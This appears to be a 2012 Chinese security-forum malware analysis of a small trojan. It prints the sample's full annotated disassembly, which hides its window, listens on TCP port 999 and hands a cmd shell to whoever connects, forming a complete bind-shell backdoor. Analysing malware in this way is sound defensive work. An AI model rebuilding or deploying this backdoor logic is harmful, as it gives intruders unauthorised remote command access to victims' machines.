-
-
[原创]mini木马分析(菜鸟级不要嘲笑)
-
发表于: 2012-9-14 21:37 7853
-
又是一个比较菜的木马分析,很久以前的木马,大家不要见笑。不积跬步无以至千里,我还是慢慢来呵呵。利用telent可以远程登录
基本信息
报告名称:mini木马分析
作者:
报告更新日期:
样本发现日期: 2012.09.11
样本类型:
样本文件大小/被感染文件变化长度:
样本文件MD5 校验值:
样本文件SHA1 校验值:
壳信息:
可能受到威胁的系统:
相关漏洞:
已知检测名称:
简介
远程登录木马
网络症状
被监听的端口 999
详细分析/功能介绍
1.隐藏窗口
2.绑定999端口
3.监听等待客户端的连接请求
4.连接客户端
5.远程登录
预防及修复措施
设置防火墙,关注杀软提示
.text:00411410 wmain proc near ; CODE XREF: j_wmainj
.text:00411410
.text:00411410 var_504 = byte ptr -504h
.text:00411410 CommandLine = word ptr -440h
.text:00411410 StartupInfo = _STARTUPINFOW ptr -238h
.text:00411410 Dst = dword ptr -1ECh
.text:00411410 hObject = dword ptr -1E8h
.text:00411410 addrlen = dword ptr -1D4h
.text:00411410 name = sockaddr ptr -1C8h
.text:00411410 var_1B0 = dword ptr -1B0h
.text:00411410 s = dword ptr -1A4h
.text:00411410 WSAData = WSAData ptr -198h
.text:00411410 var_4 = dword ptr -4
.text:00411410
.text:00411410 push ebp
.text:00411411 mov ebp, esp
.text:00411413 sub esp, 504h
.text:00411419 push ebx
.text:0041141A push esi
.text:0041141B push edi
.text:0041141C lea edi, [ebp+var_504]
.text:00411422 mov ecx, 141h
.text:00411427 mov eax, 0CCCCCCCCh
.text:0041142C rep stosd
.text:0041142E mov eax, __security_cookie
.text:00411433 xor eax, ebp
.text:00411435 mov [ebp+var_4], eax
.text:00411438 mov esi, esp
隐藏窗口
.text:0041143A push 0 ; nCmdShow
.text:0041143C push 0 ; hWnd
.text:0041143E call ds:__imp__ShowWindow@8 ; ShowWindow(x,x)
初始化数据
.text:00411444 cmp esi, esp
.text:00411446 call j__RTC_CheckEsp; unicode校验函数
.text:0041144B push 10h ; Size
.text:0041144D push 0 ; Val
.text:0041144F lea eax, [ebp+Dst]
.text:00411455 push eax ; Dst
.text:00411456 call j__memset
.text:0041145B add esp, 0Ch
.text:0041145E push 44h ; Size
.text:00411460 push 0 ; Val
.text:00411462 lea eax, [ebp+StartupInfo]
.text:00411468 push eax ; Dst
.text:00411469 call j__memset
.text:0041146E add esp, 0Ch
.text:00411471 push 0FFh ; Size
.text:00411476 push 0 ; Val
.text:00411478 lea eax, [ebp+CommandLine]
.text:0041147E push eax ; Dst
.text:0041147F call j__memset
.text:00411484 add esp, 0Ch
.text:00411487 mov esi, esp
.text:00411489 push 1FEh ; nSize
.text:0041148E lea eax, [ebp+CommandLine]
.text:00411494 push eax ; lpBuffer
.text:00411495 push offset Name ;
COMSPEC 变量表示为: COMSPEC=C:\COMMAND.COM 获取命令行路径
.text:0041149A call ds:__imp__GetEnvironmentVariableW@12 ; GetEnvironmentVariableW(x,x,x)
.text:004114A0 cmp esi, esp
.text:004114A2 call j__RTC_CheckEsp
.text:004114A7 mov esi, esp
.text:004114A9 lea eax, [ebp+WSAData]
套接字编程的初始化
.text:004114AF push eax ; lpWSAData
.text:004114B0 push 202h ; wVersionRequested
.text:004114B5 call ds:__imp__WSAStartup@8 ; WSAStartup(x,x)
.text:004114BB cmp esi, esp
.text:004114BD call j__RTC_CheckEsp
.text:004114C2 mov esi, esp
创建套接字
.text:004114C4 push 0 ; dwFlags
.text:004114C6 push 0 ; g
.text:004114C8 push 0 ; lpProtocolInfo
.text:004114CA push 6 ; protocol
.text:004114CC push 1 ; type
.text:004114CE push 2 ; af
.text:004114D0 call ds:__imp__WSASocketW@24 ; WSASocketW(x,x,x,x,x,x)
.text:004114D6 cmp esi, esp
.text:004114D8 call j__RTC_CheckEsp
.text:004114DD mov [ebp+s], eax
.text:004114E3 mov eax, 2
.text:004114E8 mov [ebp+name.sa_family], ax
.text:004114EF mov dword ptr [ebp+name.sa_data+2], 0
.text:004114F9 mov esi, esp
.text:004114FB push 999 ; hostshort
.text:00411500 call ds:__imp__htons@4 ; htons(x)
.text:00411506 cmp esi, esp
.text:00411508 call j__RTC_CheckEsp
.text:0041150D mov word ptr [ebp+name.sa_data], ax
.text:00411514 mov esi, esp
绑定端口999
.text:00411516 push 10h ; namelen
.text:00411518 lea eax, [ebp+name]
.text:0041151E push eax ; name
.text:0041151F mov ecx, [ebp+s]
.text:00411525 push ecx ; s
.text:00411526 call ds:__imp__bind@12 ;
.text:0041152C cmp esi, esp
.text:0041152E call j__RTC_CheckEsp
.text:00411533 mov esi, esp
监听
.text:00411535 push 1 ; backlog
.text:00411537 mov eax, [ebp+s]
.text:0041153D push eax ; s
.text:0041153E call ds:__imp__listen@8 ;
.text:00411544 cmp esi, esp
.text:00411546 call j__RTC_CheckEsp
.text:0041154B mov [ebp+addrlen], 10h
.text:00411555 mov esi, esp
连接远程服务器
.text:00411557 lea eax, [ebp+addrlen]
.text:0041155D push eax ; addrlen
.text:0041155E lea ecx, [ebp+name]
.text:00411564 push ecx ; addr
.text:00411565 mov edx, [ebp+s]
.text:0041156B push edx ; s
.text:0041156C call ds:__imp__accept@12 ;
.text:00411572 cmp esi, esp
.text:00411574 call j__RTC_CheckEsp
.text:00411579 mov [ebp+var_1B0], eax
.text:0041157F mov [ebp+StartupInfo.cb], 44h
.text:00411589 xor eax, eax
.text:0041158B mov [ebp+StartupInfo.wShowWindow], ax
.text:00411592 mov [ebp+StartupInfo.dwFlags], 101h
.text:0041159C mov eax, [ebp+var_1B0]
.text:004115A2 mov [ebp+StartupInfo.hStdError], eax ; 设置进程的输入输出缓冲区句柄为套接字
.text:004115A8 mov eax, [ebp+var_1B0]
.text:004115AE mov [ebp+StartupInfo.hStdInput], eax
.text:004115B4 mov eax, [ebp+var_1B0]
.text:004115BA mov [ebp+StartupInfo.hStdOutput], eax
.text:004115C0 mov esi, esp
.text:004115C2 lea eax, [ebp+Dst]
.text:004115C8 push eax ; lpProcessInformation
.text:004115C9 lea ecx, [ebp+StartupInfo]
创建进程 打开命令行 命令行的输入输出缓冲区为 已套接字
.text:004115CF push ecx ; lpStartupInfo
.text:004115D0 push 0 ; lpCurrentDirectory
.text:004115D2 push 0 ; lpEnvironment
.text:004115D4 push 0 ; dwCreationFlags
.text:004115D6 push 1 ; bInheritHandles
.text:004115D8 push 0 ; lpThreadAttributes
.text:004115DA push 0 ; lpProcessAttributes
.text:004115DC lea edx, [ebp+CommandLine]
.text:004115E2 push edx ; lpCommandLine
.text:004115E3 push 0 ; lpApplicationName
.text:004115E5 call ds:__imp__CreateProcessW@40 ; CreateProcessW(x,x,x,x,x,x,x,x,x,x)
.text:004115EB cmp esi, esp ;
.text:004115ED call j__RTC_CheckEsp
.text:004115F2 mov esi, esp
等待进程创建完毕
.text:004115F4 push 0FFFFFFFFh ; dwMilliseconds
.text:004115F6 mov eax, [ebp+Dst]
.text:004115FC push eax ; hHandle
.text:004115FD call ds:__imp__WaitForSingleObject@8 ; WaitForSingleObject(x,x)
.text:00411603 cmp esi, esp ;
.text:00411605 call j__RTC_CheckEsp
.text:0041160A mov esi, esp
.text:0041160C mov eax, [ebp+Dst]
.text:00411612 push eax ; hObject
.text:00411613 call ds:__imp__CloseHandle@4 ; CloseHandle(x)
.text:00411619 cmp esi, esp
.text:0041161B call j__RTC_CheckEsp
.text:00411620 mov esi, esp
.text:00411622 mov eax, [ebp+hObject]
.text:00411628 push eax ; hObject
.text:00411629 call ds:__imp__CloseHandle@4 ; CloseHandle(x)
.text:0041162F cmp esi, esp
.text:00411631 call j__RTC_CheckEsp
.text:00411636 mov esi, esp ; 关闭句柄
.text:00411638 mov eax, [ebp+s]
.text:0041163E push eax ; s
.text:0041163F call ds:__imp__closesocket@4 ; closesocket(x)
.text:00411645 cmp esi, esp
.text:00411647 call j__RTC_CheckEsp
.text:0041164C mov esi, esp
.text:0041164E mov eax, [ebp+var_1B0]
.text:00411654 push eax ; s
.text:00411655 call ds:__imp__closesocket@4 ; closesocket(x)
.text:0041165B cmp esi, esp
.text:0041165D call j__RTC_CheckEsp
.text:00411662 mov esi, esp
.text:00411664 call ds:__imp__WSACleanup@0 ; WSACleanup()
.text:0041166A cmp esi, esp
.text:0041166C call j__RTC_CheckEsp ; 关闭套接字,释放dll
.text:00411671 xor eax, eax
.text:00411673 push edx
.text:00411674 mov ecx, ebp
.text:00411676 push eax
.text:00411677 lea edx, dword_4116A4
.text:0041167D call j__RTC_CheckStackVars
.text:00411682 pop eax
.text:00411683 pop edx
.text:00411684 pop edi
.text:00411685 pop esi
.text:00411686 pop ebx
.text:00411687 mov ecx, [ebp+var_4]
.text:0041168A xor ecx, ebp
.text:0041168C call j___security_check_cookie
.text:00411691 add esp, 504h
.text:00411697 cmp ebp, esp
.text:00411699 call j__RTC_CheckEsp
.text:0041169E mov esp, ebp
.text:004116A0 pop ebp
.text:004116A1 retn
.text:004116A1 wmain endp
.text:004116A1
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
赞赏
- [原创]反编译工具dava的使用,个人觉得效果比jad/jd-gui效果好 27597
- [求助]有没有哪位兄弟 提供一个加壳的apk研究一下 6586
- android逆向问题 5722
- android逆向问题 8176
- [求助][求助]lnk文件中SHITEMID结构的问题 4467